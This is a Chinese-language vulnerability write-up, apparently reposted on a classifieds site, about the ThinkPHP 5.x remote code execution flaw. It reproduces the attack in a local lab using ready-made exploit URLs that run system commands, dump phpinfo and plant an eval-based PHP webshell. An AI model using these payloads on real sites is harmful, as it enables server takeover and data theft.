您好,欢迎来到三六零分类信息网!老站,搜索引擎当天收录,欢迎发信息

thinkphp远程执行命令漏洞

2024/3/25 3:16:08发布20次查看
漏洞概况
thinkphp是一款国内流行的开源php框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入php代码,导致远程代码执行。
虽然该漏洞利用需要有几个前提条件,但鉴于国内使用thinkphp框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。
漏洞危害
攻击者可通过该漏洞获取网站的控制权限,可修改页面,导致数据泄漏等问题。
影响版本
5.x < 5.1.31, <= 5.0.23
复现环境
thinkphp5.1 phpstudy集成环境(php5.6n+apache+mysql)
复现过程
1、如图所示首先搭建好环境
2、利用system函数远程命令执行:
http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=system&vars%5b1%5d%5b%5d=whoami
3、通过phpinfo函数写出phpinfo()的信息:
http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=phpinfo&vars%5b1%5d%5b%5d=1
4、写入shell:
http://localhost/thinkphp5.1/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3c?php%20@eval($_get[%22code%22])?^%3e%3eshell.php

http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>
推荐教程:《tp5》
以上就是thinkphp远程执行命令漏洞的详细内容。
该用户其它信息

VIP推荐

免费发布信息,免费发布B2B信息网站平台 - 三六零分类信息网 沪ICP备09012988号-2
企业名录 Product